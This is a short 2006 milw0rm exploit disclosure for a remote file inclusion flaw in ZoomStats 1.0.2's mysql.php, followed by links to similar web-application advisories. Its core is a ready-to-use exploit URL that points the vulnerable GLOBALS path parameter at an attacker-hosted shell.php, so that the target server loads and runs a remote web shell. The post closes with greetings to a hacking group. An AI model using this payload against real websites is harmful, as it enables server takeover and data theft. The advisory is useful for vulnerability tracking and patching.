Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) iyzi Forum s1 b2 (tr) SQL Injection Vulnerability [SA22075] Web-News "content_page" File Inclusion Vulnerability [Full-disclosure] Local File Inclusion : Kietu [Full-disclosure] Remote File Include in syntaxCMS From:MILW0RM <submit_(at)_milw0rm.com> Date:25.09.2006Subject:ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability###### ToXiC ######################### # #BuG FounD by Drago84 # #Application Affect:ZoomStats #Source Code: #http://prdownloads.sourceforge.net/zoomstats/ZoomStats-v1.0.2.zip?use_mirror=ken t #Problem: #$GLOBALS['lib']['db']['path'] array not declare #Solution : $GLOBALS['lib']['db']['path'] #Page Vulnerable : mysql.php #Dir Page: /libs/dbmax/ # Exempe Of ExPloit is: #http://www.site.com/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['d b']['path']=http://marcusbestlamer.gay/shell.php? #GrEatZ All Member of ToXiC, Str0ke # ToXic Security ###### ToXiC ###Drago84############### # milw0rm.com [2006-09-24]
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
iyzi Forum s1 b2 (tr) SQL Injection Vulnerability
[SA22075] Web-News "content_page" File Inclusion Vulnerability
[Full-disclosure] Local File Inclusion : Kietu
[Full-disclosure] Remote File Include in syntaxCMS
